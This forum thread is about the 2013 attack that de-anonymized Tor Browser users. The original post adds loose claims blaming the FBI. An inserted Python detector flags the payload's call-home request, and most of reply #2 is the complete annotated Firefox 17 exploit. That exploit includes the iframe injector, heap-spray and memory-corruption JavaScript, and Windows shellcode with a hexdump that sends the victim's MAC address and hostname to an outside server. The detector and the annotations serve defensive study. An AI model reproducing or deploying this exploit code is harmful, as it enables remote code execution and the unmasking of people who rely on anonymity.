
Tor: Anonymity, Vulnerability, FBI Infiltration


  • News Tor: Anonymity, Vulnerability, FBI Infiltration

    On 4 August at midnight, TOR nodes were reported missing from the anonymity network. It was later learned that TOR, the worldwide network of decentralized routers, had just been the victim of a serious attack. The vulnerability behind it allows a hacker to execute arbitrary code in a remote browser.

    The TOR security vulnerability is due to a bundle built into versions of Firefox earlier than 17.0.7. Only Windows users paid the price (for a change).

    The malware injected into vulnerable browsers is JavaScript code that collects the MAC addresses and real IP addresses of the device it runs on, and then sends them to a web server over a non-anonymous channel. Although the number of affected devices is not known, all Windows users are at risk.

    One question then arises: who could be responsible? Although no one has claimed responsibility, the speculation gathered here and there converges on the FBI.

    We have been telling you for ages that the TOR network brings more problems than solutions!

    Indeed, the network is heavily monitored by governments, and some relay servers belong to them, which lets them do the equivalent of a MITM while letting users believe they have found the holy grail of anonymity!

    Cyprium Download Link

    The more I study, the more I realize I know nothing.

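As an added example (not part of the original post, nor of the analysis quoted in reply #2): a detector for captured HTTP requests that have the shape of the payload's clear-net call-home described above. The request shape (a bare-UUID path, a `Cookie: ID=` header carrying the MAC address as 12 hex digits, the machine name in `Host`, no `User-Agent`) is an assumption read from the strings in the shellcode posted in reply #2; the sample requests and all function names are constructed for illustration.

```python
"""Flag HTTP requests shaped like the de-anonymizing call-home (added example)."""
import re
from typing import NamedTuple, Optional

# Assumed beacon shape: "GET /<uuid> HTTP/1.1" with "Cookie: ID=<12 hex digits>".
UUID_PATH = re.compile(
    r"^/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)
MAC_COOKIE = re.compile(r"^ID=([0-9A-Fa-f]{12})$")


class Finding(NamedTuple):
    signals: tuple       # names of the indicators that matched
    mac: Optional[str]   # MAC address recovered from the cookie, if any
    host: str            # value of the Host header

    @property
    def is_beacon(self) -> bool:
        # Both core indicators must match; the others only add confidence.
        return "uuid-path" in self.signals and "mac-cookie" in self.signals


def parse_head(raw: bytes):
    """Return (method, target, headers) or None if this is not an HTTP/1.x head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/1."):
        return None
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            return None  # malformed header line
        headers.setdefault(name.strip().lower(), value.strip())
    return parts[0], parts[1], headers


def inspect_request(raw: bytes) -> Optional[Finding]:
    """Score one captured request against the assumed beacon shape."""
    parsed = parse_head(raw)
    if parsed is None:
        return None
    method, target, headers = parsed
    signals, mac = [], None
    if method == "GET" and UUID_PATH.match(target):
        signals.append("uuid-path")
    match = MAC_COOKIE.match(headers.get("cookie", ""))
    if match:
        signals.append("mac-cookie")
        digits = match.group(1).upper()
        mac = ":".join(digits[i:i + 2] for i in range(0, 12, 2))
    host = headers.get("host", "")
    if host and "." not in host and ":" not in host:
        signals.append("bare-hostname")   # machine name, not a domain or IP
    if "user-agent" not in headers:
        signals.append("no-user-agent")   # request not built by a browser
    return Finding(tuple(signals), mac, host)


# Constructed sample captures (not taken from the page).
SAMPLES = {
    "beacon-like": (b"GET /11111111-2222-4333-8444-555555555555 HTTP/1.1\r\n"
                    b"Host: WORKSTATION-7\r\nCookie: ID=001122AABBCC\r\n"
                    b"Connection: keep-alive\r\nAccept: */*\r\n"
                    b"Accept-Encoding: gzip\r\n\r\n"),
    "browser": (b"GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n"
                b"User-Agent: Mozilla/5.0\r\nCookie: session=abc123\r\n\r\n"),
    "uuid-api": (b"GET /11111111-2222-4333-8444-555555555555 HTTP/1.1\r\n"
                 b"Host: api.example.org\r\nUser-Agent: curl/8.0\r\n"
                 b"Cookie: ID=42\r\n\r\n"),
    "garbage": b"\x16\x03\x01\x02\x00\x01",   # not HTTP at all
}


def triage(samples):
    """Map each sample name to True/False (beacon or not) or None (unparseable)."""
    out = {}
    for name, raw in samples.items():
        finding = inspect_request(raw)
        out[name] = finding.is_beacon if finding else None
    return out


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw))
```

On a host that is supposed to reach the network only through Tor, any direct outbound request is already a leak; the shape match only tells you which leak it is.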

  • #2
    FYI, below is the sploit that was used.

    3 conditions for it to run:
    - Being on Windows
    - Using FF 17
    - Having JavaScript enabled

    The sploit was distributed following the compromise of FreedomHosting by our necktie-wearing friends at the FBI.

    Code:
    /****************************************************************************
     * Exploits delivered through nl7qbezu7pqsuone.onion (2013-08-03):
     *
     *  The compromised server inserts a run-of-the-mill unobfuscated iframe
     * injection script; others have observed this and samples have been posted.
     *
     *  The exploit is split across three files and presumably an ultimate
     * payload of malware that was not obtained.
     */
    
    // To preserve the JavaScript syntax highlighting, non-JS bits are commented out.
    
    /****************************************************************************
     *  A somewhat cleaned up version is presented first, the original exploit
     * as first downloaded follows.
     *
     *  This appears to be an exploit in the Firefox 17 JS runtime. The script
     * does not attempt the exploit unless running on Firefox 17 on Windows.
     */
    
    /****************************************************************************
     * A compromised server inserts a script like the following.
     * The XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX is a UUID generated by the server.
     * The exploit host will serve the exploit for any UUID, however.
     * I used 05cea4de-951d-4037-bf8f-f69055b279bb for this analysis.
     * The UUID is embedded in the shellcode.
     */
    
    //<script type='text/javascript'>
    
    function createCookie(name,value,minutes) {
    	if (minutes) {
    		var date = new Date();
    		date.setTime(date.getTime()+(minutes*60*1000));
    		var expires = "; expires="+date.toGMTString();
    	}
    	else var expires = "";
    	document.cookie = name+"="+value+expires+"; path=/";
    }
    
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
        	var c = ca[i];
        	while (c.charAt(0)==' ') c = c.substring(1,c.length);
        	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
    
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
    
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
        iframe.height = "5";
        iframe.width = "*";
        document.body.appendChild(iframe);
    }
    
    function format_quick() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
            updatify();
        }
    }
    
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {
        
            if ( isFF() ) {
                format_quick();
            }
        }
        else
        {
            setTimeout(isReady, 250);
        }
    }
    setTimeout(isReady, 250);
    //</script>
    
    /****************************************************************************
     *  The exploit server at nl7qbezu7pqsuone.onion also delivers two supporting
     * pieces that are loaded into their own iframes.  Since they are short,
     * they are included before the main exploit.
     *
     * (All lines containing HTML are commented out.)
     */
    
    //// "content_2.html"
    // <html><body></body></html>
    // <script>
      var y="?????", url=window.location.href;
      if(0>url.indexOf(y)) {
        var iframe=document.createElement("iframe");
        iframe.src="content_3.html";
        document.body.appendChild(iframe)
      } else parent.w();
      function df(){return parent.df()};
    // </script>
    
    //// "content_3.html"
    // <script>
      var y="?????",z="<body><img height='1' width='1' src='error.html' onerror=\"javascript: window.location.href='content_2.html?????';\" ></body>",flag=!1,var83=0;
    
      function b() {
        for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)
          e[c]=new ArrayBuffer(180);
        for(c=0;1024>c;c++)
          d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;
          return d
      }
      function a() {
        !1==flag && (flag=!0,window.stop());
        window.stop();
        b();
        window.parent.frames[0].frameElement.ownerDocument.write(z);
        b()
      }
        var83 = parent.df();
        0!=var83 && document.addEventListener("readystatechange",a,!1);
    // </script>
    
    //// The main exploit
    // <html>
    // <body>
    // <iframe frameborder=0  border=0 height=1 width=1 id="iframe"> </iframe>	
    // </body>
    // </html>
    
    // <script>
    
    var var1=0xB0;
    var var2 = new Array(var1);					
    var var3 = new Array(var1);	
    var var4 = new Array(var1);
    
    var var5=0xFF004; 	
    var var6=0x3FC01;  
    
    var var7=0x60000000; 
    var var8=0x18000000; 
    
    
    var var9=1;
    
    var var10 = 0x12000000;
    var var11 = 0;
    var var12=0; // set in b() if on Firefox 17, read in df()
    // exploit will not be attempted unless var12 is set
    
    var var13 =0; 
    
    // top entry point, called as onload handler
    function u()
    {	
    	if( t() == true )
    	{
    		var9 = 1;		
    		b();
    		d();
    		c();
    	}else{
    		return ;
    	}
    }
    
    function t() // only attempt the exploit once per session
    {
    	if(typeof sessionStorage.tempStor !="undefined")
    		return false;
    	sessionStorage.tempStor="";
    	return true;
    }
    
    function b()
    {
    	var version = al(); // ensure Firefox on Windows
    	if(version <17)  
    	{
    		window.location.href="content_1.html"; 
    	} // "content_1.html" was never obtained
    	if( version >=17 && version <18 )
    		var12 = 0xE8;
    	return ;
    }
    
    function aj(version) // confirm Windows platform
    {
    	var i = navigator.userAgent.indexOf("Windows NT");
    	if (i != -1)
    		return true;
    	return false;
    }
    
    function ak() // confirm Firefox browser
    {
    	var ua = navigator.userAgent;
    	var browser = ua.substring(0, ua.lastIndexOf("/"));
    	browser = browser.substring(browser.lastIndexOf(" ") + 1);
    	if (browser != "Firefox")
    		return -1;
    
    	var version = ua.substring(ua.lastIndexOf("/") + 1);
    	version = parseInt(version.substring(0, version.lastIndexOf(".")));
    	return version;
    }
    
    function al() // get browser version, -1 if not exploitable
    {
    	version = ak();
    
    	if (!aj(version))
    		return -1;
    	return version;
    }
    		
    function d()
    {
    	for(var j=0;j<var1;j++)
    	{
    		if( j<var1/8 || j==var1-1)
    		{
    			var tabb = new Array(0x1ED00);
    			var4[j]=tabb;
    			for(i=0;i<0x1ED00;i++)
    			{
    				var4[j][i]=0x11559944;
    			}	
    		}
    		var2[j]= new ArrayBuffer(var5); 
    	}
    	for(var j=0;j<var1;j++)
    	{
    		var3[j]= new Int32Array(var2[j],0,var6);
    		var3[j][0]=0x11336688;   										
    		
    		for(var i=1;i<16;i++)	
    		{  					
    			var3[j][0x4000*i] = 0x11446688;   							
    		}
    			
    	}	
    
    	for(var j=0;j<var1;j++)
    	{
    		if(typeof var4[j] !="undefined")
    		{
    			var4[j][0]=0x22556611;   
    		}
    	}
    }
    
    // load the next piece of the exploit
    function c()
    {
    	var iframe=document.getElementById("iframe");
    	iframe.src="content_2.html";
    }
    
    // functions below here are called from the other iframes
    
    // df() is passed through content_2 and used by content_3
    // called nowhere else
    // The exploit is not attempted if this returns zero.
    // Note that var12 will be zero unless on Firefox 17.
    // The returned value is used as part of a heap spray in content_3.
    function df()
    {
    	if(var12==0)
    	{
    		return 0x00000000;
    	}
    	var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
    
    	if( var9 == 1 || var9 == 2)
    		return ( var14 - var12);
    	else
    		return 0x00000000;
    }
    
    // w() is called from the second time content_2 is loaded
    function w()
    {
    	if(var9==1)
    		v();
    	else
    		x();
    }
    
    function v()
    {
    	if(k() == -1)
    	{
    		var11 = p();
    		var9 = 2;	
    		c();
    	}else{
    		x();
    	}
    }
    
    //  This quickly becomes a huge mess that is obviously depending
    // on the JS runtime to screw up in some arcane way.  Little is
    // known about the actual exploit, other than some apparent
    // shellcode in function f().  Here be dragons.
    
    function k()
    {
    	for(var j=0;j<var1;j++)
    	{
    		if(var2[j].byteLength!=var5)
    		{
    			return j;
    		}
    	}
    	return -1;
    }
    
    function p()
    {
    	for(var j=0;j<var1;j++)
    	{
    		for(var i=1;i<16;i++)
    		{
    			if(var3[j][i*0x4000-0x02]==0x01000000)
    			{
    				return -i;
    			}
    		}
    	}
    	return 0;
    } 
    
    function x()
    {
    
    	var var60 = k();
    	if(var60==-1)
    		return ;			
    
    	var nextvar60 = q(var60);
    	if(nextvar60==-1)
    		return ;   				
    		
    	var var61 = o(var60);
    	var var62  = new Int32Array(var2[nextvar60],0,var8);
    	var var58 = n(var62,var61);
    	if(var58==-1)
    		return ;			
    
    	var var50 = m(var62,var58);
    
    	var13 = var10 + 0x00100000 + 0x00010000 * var11; 
    	e(var62);
    
    	l(var62,var58);
    
    	var var64 = var4[var50][0];
    
    	ac(var64,var50,var62,var58,var60);
    }
    
    function q(var60)
    {
    	var view  = new Int32Array(var2[var60],0,0x00040400);
    	view[0x00100000/4-0x02]=var7; 
    	if(var2[var60+1].byteLength==var7)
    		return var60+1;
    	return -1;
    }
    
    function o(var60)
    {
    	var view  = new Int32Array(var2[var60],0,0x00040400);
    
    	var var59 = view[0x00100000/4-0x0C];
    	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	
    
    	return ((var59 - var57)/4);
    }
    
    function n(view,firstvar58)
    {
    	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	
    	var var58=0;
    	for(var i=0;i<200;i++)
    	{
    		if(view[var58] != 0x11336688)  	
    		{
    			if(view[var58] == 0x22556611 )  
    				return  var58;
    			else
    				return -1;
    		}
    		if(var58==0)
    		{
    			var58 = firstvar58;
    		}else{
    			var var59=view[var58-0x0C];
    			var58 = (var59 - var57)/4;
    		}
    	}
    	return -1;
    }
    
    function m(view,var58)
    {
    	view[var58]=0x00000000;  
    	for(var j=0;j<var1;j++)
    	{
    		if(typeof var4[j] !="undefined")
    		{
    			if(var4[j][0]!=0x22556611) 
    				return j;
    		}
    	}
    	return -1
    }
    
    function e(view)
    {
    	var i=0;
    	for(i=0;i<0x400;i++)
    	{
    		view[i] = var13+0x1010 ; 
    	}
    	view[0x0]=var13+0x1010; 		
    	view[0x44]=0x0;				
    	view[0x45]=0x0;				
    	view[0x400-4]=var13+0x1010; 	
    	view[0x400]=0x00004004;		     		
    	view[0x401]=0x7FFE0300;				
    }
    
    function l(view,var58)
    {
    	view[var58] = var13 + 0x1030;	
    	view[var58+1] = 0xFFFFFF85;    		
    }
    
    function ac(var64,var50,var62,var58,var60)
    {
    	var var15=ah(var64);
    
    	f(var15,var62,var58);
    
    	y(var50);
    	var var66 = aa(var62,var58+2);
    
    	var var67 = i(var66,0x40,var50,var62) ;
    	j(var67,var62);
    
    	g(var50,var62);
    	ab(var13+0x1040 ,var62,var58+2);
    
    	r(var60)
    	setTimeout(ad,1000);
    	z(var50);
    }	
    
    function ah(var73)
    { 
    	var var74 = var73.substring(0,2);
        var var70 = var74.charCodeAt(0);
        var var71 = var74.charCodeAt(1);
        var var75 = (var71 << 16) + var70;
        if (var75 == 0)
        {
            var var76 = var73.substring(32, 34);
            var var70 = var76.charCodeAt(0);
            var var71 = var76.charCodeAt(1);
            var75 = (var71 << 16) + var70;
        }
        var var15 = am(var75);
        if (var15 == -1)
        {
            return;
        }
        return var15
    }
    
    function am(var77)
    {
        var var15 = new Array(2);
         if (var77 % 0x10000 == 0xE510) 					
         {      
            var78 = var77 - 0xE510;
            var15[0] = var78 + 0xE8AE;                   
            var15[1] = var78 + 0xD6EE;                   
        } 
        else if (var77 % 0x10000 == 0x9A90) 			
        {   
            var78 = var77 - 0x69A90;
            var15[0] = var78 + 0x6A063;                 
            var15[1] = var78 + 0x68968;                  
        } 
        else if (var77 % 0x10000 == 0x5E70) 				
        {   
            var78 = var77 - 0x65E70;
            var15[0] = var78 + 0x66413;                  
            var15[1] = var78 + 0x64D34;                 
        } 
        else if (var77 % 0x10000 == 0x35F3) 				
        {   
            var78 = var77 - 0x335F3;
            var15[0] = var78 + 0x4DE13;                  
            var15[1] = var78 + 0x49AB8;                  
        } 
        else if (var77 % 0x10000 == 0x5CA0) 				
        {   
            var78 = var77 - 0x65CA0;
            var15[0] = var78 + 0x66253;                 
            var15[1] = var78 + 0x64B84;                  
        } 
        else if (var77 % 0x10000 == 0x5CD0) 	 			
        {  
            var78 = var77 - 0x65CD0;
            var15[0] = var78 + 0x662A3;                  
            var15[1] = var78 + 0x64BA4;                 
            
        } 
        else if (var77 % 0x10000 == 0x6190)   			
        { 
            var78 = var77 - 0x46190;
            var15[0] = var78 + 0x467D3;                 
            var15[1] = var78 + 0x45000;                   
            
        } 
        else if (var77 % 0x10000 == 0x9CB9) 			
        {   
            var78 = var77 - 0x29CB9;
            var15[0] = var78 + 0x29B83;                
            var15[1] = var78 + 0xFFC8;                  
        } 
        else if (var77 % 0x10000 == 0x9CE9)			
        {   
            var78 = var77 - 0x29CE9;
            var15[0] = var78 + 0x29BB3;                 
            var15[1] = var78 + 0xFFD8;                  
        } 
        else if (var77 % 0x10000 == 0x70B0) 				
        {   
            var78 = var77 - 0x470B0;
            var15[0] = var78 + 0x47733;                  
            var15[1] = var78 + 0x45F18;                
        } 
        else if (var77 % 0x10000 == 0x7090)  			
        {  
            var78 = var77 - 0x47090;
            var15[0] = var78 + 0x476B3;               
            var15[1] = var78 + 0x45F18;                
        } 
        else if (var77 % 0x10000 == 0x9E49)   			
        { 
            var78 = var77 - 0x29E49;
            var15[0] = var78 + 0x29D13;                 
            var15[1] = var78 + 0x10028;                 
        } 
        else if (var77 % 0x10000 == 0x9E69)    		
        {
            var78 = var77 - 0x29E69;
            var15[0] = var78 + 0x29D33;              
            var15[1] = var78 + 0x10018;              
        }
        
        else if (var77 % 0x10000 == 0x9EB9)			
        {
            var78 = var77 - 0x29EB9;	
            var15[0] = var78 + 0x29D83;              
            var15[1] = var78 + 0xFFC8;              
        }
        else 
        {
            return -1;                         
        }
        
        return var15;
    }
    
    function f(var15,view,var16)
    {
    	var magneto = "";
    	var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+
"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
    	var var29 = magneto;
    	var var17 = "\u9060";
    	var var18 = "\u9061";
    	var var19 = "\uC481\u0000\u0008" ; 
    	var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF); 
    	var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF);
    	var var22 = "\uE589"; 
    	var var23 ="\uC3C9";
    	var var24  = "\uE889";         
    	var24 += "\u608D\u90C0";       
    
    	var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
    	var var26 = var25 + var16*4
    
    	var var27 =""
    	var27 += "\uB890\u2020\u2020";          				      
    	var27 += "\uA390"+ae(var26+0x00);
    	var27 += "\uA390"+ae(var26+0x04);
    	var27 += "\uA390"+ae(var26+0x08);
    	var27 += "\uA390"+ae(var26+0x0C);
    
    	var var28  = var17;
    	var28 += var20;
    	var28 += var19;
    	var28 += var22;
    	var28 += var27;
    	var28 += var29;
        var28 += var21;
        var28 += var18;
        var28 += var23;
    	var var29Array = new Array();
    	var29Array=ag(var28);
    
    	var var29Ad = var13+0x5010;
    	var i=0;
    	var j=0;
    	var var30=var13+0x4048;
    	var var31 = new Array();
    
    	var31[0]=var30; 			
    	var31[1]=var30; 			
    	var31[2]=var30; 			
    	var31[3]=var15[1];			
    	var31[4]=var29Ad;		
    	var31[5]=0xFFFFFFFF;			
    	var31[6]=var13+0x4044;	
    	var31[7]=var13+0x4040;	
    	var31[8]=0x00000040;			
    	var31[9]=var13+0x4048;	
    	var31[10]=0x00040000;		
    	var31[11]=var29Ad;		
    	var31[12]=var13+0x301C;	
    		
    	for(var i=0 ; i < 0x140 ; i++)
    	{
    		var31[i+15]=var15[0]; 
    	}	
    	var var32 = 0x3F8;		
    	view[0x800+0+var32]=var13+0x4018;  
    	view[0x800+1+var32]=var13+0x4018; 
    	for(var i=2 ; i < var31.length  ; i++)
    	{
    		view[0x800+i+var32]=  0x41414141; 
    	}		
    	for(var i=0 ; i < var31.length  ; i++)
    	{
    		view[0xC02+i+var32]=  var31[i];
    	}				
    	for(var i=0 ; i < var29Array.length ; i++)
    	{
    		view[0x1000 + i+var32] = var29Array[i];
    	}			
    	
    }
    
    function ae(int32)
    {
        var var68 = String.fromCharCode((int32)& 0x0000FFFF);
        var var69 = String.fromCharCode((int32 >> 16)  & 0x0000FFFF);
        return var68+var69;
    }  
        
    function af(string)
    {		
        var var70 = string.charCodeAt(0);
        var var71 = string.charCodeAt(1);
        var var72 = (var71 << 16) + var70;
    	return var72;
    }	
    		
    function ag(string)
    {	
    	if(string.length%2!=0)
    		string+="\u9090";
    	var intArray= new Array();
    	for(var i=0 ; i*2 < string.length; i++ )
    		intArray[i]=af(string[i*2]+string[i*2+1]);
    	return intArray;
    }	
    		
    function y(index)
    {
    	var4[index][1]= document.createElement('span') ;
    }		
    
    function aa(view,var63)
    {
    	return view[var63];
    }	
    
    function i(address,size,var50,view)
    {
    	var var56 = size/2;
    	var56 = var56*0x10 +0x04;
    	view[0x400]=var56;		  
    	view[0x401]=address;     
    	return var4[var50][0];
    }
    
    function j(memory,view)
    {
    	var intArray=ag(memory);
    	for(var i=0 ; i < intArray.length  ; i++)
    	{
    		view[0x404+i]=intArray[i];		
    	}
    }
    
    function g(var50,view)
    {
    	var k = h(var50,view);
    	var j=0;
    	if( k < 0 )
    		return -1;
    	view[0x404+k]=var13+0x3010;
    	return 1;
    }
    
    function h(var50,view)
    {
    	var address=0;
    	var u=0;
    	var memory="";
    	var var55=0;
    	for( u =7; u >=4 ;u--)
    	{
    		address=view[0x404+u];
    		if( address > 0x000A0000 && address < 0x80000000 )  
    		{
    			memory = i(address,0x48,var50,view);
    			var55=af(memory[0x14]+memory[0x15]);
    			if(var55==address)
    			{
    				return u;
    			}				
    		}
    	}
    	return -1;
    }
    
    function ab(address,view,var63)
    {
    	view[var63]=address;
    }	
    
    function r(var60)
    {
    	var view  = new Int32Array(var2[var60],0,0x00040400);
    	view[0x00100000/4-0x02]=var5; 
    }
    
    function z(index,index2)
    {
    	var4[index][1].innerHTML;
    }		
    
    // ad() is called through setTimeout
    function ad()
    {
    	for(var j=0;j<var1;j++)
    	{
    		delete var3[j]
    		var3[j]= null;
    		
    		delete var2[j];
    		var2[j] = null;
    
    		if(typeof var4[j] !="undefined")
    		{
    			delete var4[j];		
    			var4[j] = null;
    		}	
    	}	
    	delete var2;
    	delete var3;
    	delete var4;	
    	var2=null;
    	var3=null;
    	var4=null;	
    }
    
    window.addEventListener("onload", u(),true);
    
    // </script>
    
    /****************************************************************************
     * This is a hexdump of the shellcode block as "var magneto" in f() above.
     */
    //  0000  60 fc e8 8a 00 00 00 60  89 e5 31 d2 64 8b 52 30  |`......`..1.d.R0|
    //  0010  8b 52 0c 8b 52 14 8b 72  28 0f b7 4a 26 31 ff 31  |.R..R..r(..J&1.1|
    //  0020  c0 ac 3c 61 7c 02 2c 20  c1 cf 0d 01 c7 e2 f0 52  |..<a|., .......R|
    //  0030  57 8b 52 10 8b 42 3c 01  d0 8b 40 78 85 c0 74 4a  |W.R..B<...@x..tJ|
    //  0040  01 d0 50 8b 48 18 8b 58  20 01 d3 e3 3c 49 8b 34  |..P.H..X ...<I.4|
    //  0050  8b 01 d6 31 ff 31 c0 ac  c1 cf 0d 01 c7 38 e0 75  |...1.1.......8.u|
    //  0060  f4 03 7d f8 3b 7d 24 75  e2 58 8b 58 24 01 d3 66  |..}.;}$u.X.X$..f|
    //  0070  8b 0c 4b 8b 58 1c 01 d3  8b 04 8b 01 d0 89 44 24  |..K.X.........D$|
    //  0080  24 5b 5b 61 59 5a 51 ff  e0 58 5f 5a 8b 12 eb 86  |$[[aYZQ..X_Z....|
    //  0090  05 5d 81 bd e9 02 00 00  47 45 54 20 75 70 8d 85  |.]......GET up..|
    //  00a0  d1 02 00 00 50 68 4c 77  26 07 ff d5 85 c0 74 5e  |....PhLw&.....t^|
    //  00b0  8d 85 d8 02 00 00 50 68  4c 77 26 07 ff d5 85 c0  |......PhLw&.....|
    //  00c0  74 4c bb 90 01 00 00 29  dc 54 53 68 29 80 6b 00  |tL.....).TSh).k.|
    //  00d0  ff d5 01 dc 85 c0 75 36  50 50 50 50 40 50 40 50  |......u6PPPP@P@P|
    //  00e0  68 ea 0f df e0 ff d5 31  db f7 d3 39 c3 74 1f 89  |h......1...9.t..|
